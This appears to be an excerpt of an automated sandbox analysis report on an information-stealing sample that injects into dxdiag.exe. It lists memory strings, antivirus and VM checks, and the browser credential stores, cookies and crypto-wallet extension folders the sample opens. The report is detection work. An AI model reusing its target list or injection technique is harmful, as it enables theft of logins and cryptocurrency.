                Source: dxdiag.exe, 00000002.00000003.2212583633.0000000005033000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: dxdiag.exe, 00000002.00000003.2288285003.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289289481.0000000002BE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: dxdiag.exe, 00000002.00000002.2289289481.0000000002BBC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2288285003.0000000002BBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh|
                Source: dxdiag.exe, 00000002.00000003.2212583633.0000000005033000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: dxdiag.exe, 00000002.00000003.2212583633.000000000502E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\dxdiag.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 2_2_0043B480 LdrInitializeThunk,2_2_0043B480

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\tesr.exeMemory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\tesr.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\tesr.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\tesr.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\tesr.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 43F000Jump to behavior
                Source: C:\Users\user\Desktop\tesr.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 442000Jump to behavior
                Source: C:\Users\user\Desktop\tesr.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 452000Jump to behavior
                Source: C:\Users\user\Desktop\tesr.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 453000Jump to behavior
                Source: C:\Users\user\Desktop\tesr.exeMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 82C008Jump to behavior
                Source: C:\Users\user\Desktop\tesr.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\tesr.exeCode function: 0_2_00007FF79BC16E2C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF79BC16E2C
                Source: C:\Windows\SysWOW64\dxdiag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: dxdiag.exe, 00000002.00000002.2289289481.0000000002BD5000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2262702338.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000002.2289421969.0000000002C47000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2288285003.0000000002BD5000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000002.00000003.2278524685.0000000002C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 5392, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: dxdiag.exe, 00000002.00000003.2241112447.0000000002C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: dxdiag.exe, 00000002.00000003.2241112447.0000000002C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: dxdiag.exe, 00000002.00000003.2241112447.0000000002C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: dxdiag.exe, 00000002.00000003.2241070978.0000000002C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: dxdiag.exe, 00000002.00000003.2262702338.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: dxdiag.exe, 00000002.00000003.2241070978.0000000002C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: dxdiag.exe, 00000002.00000003.2262702338.0000000002C47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
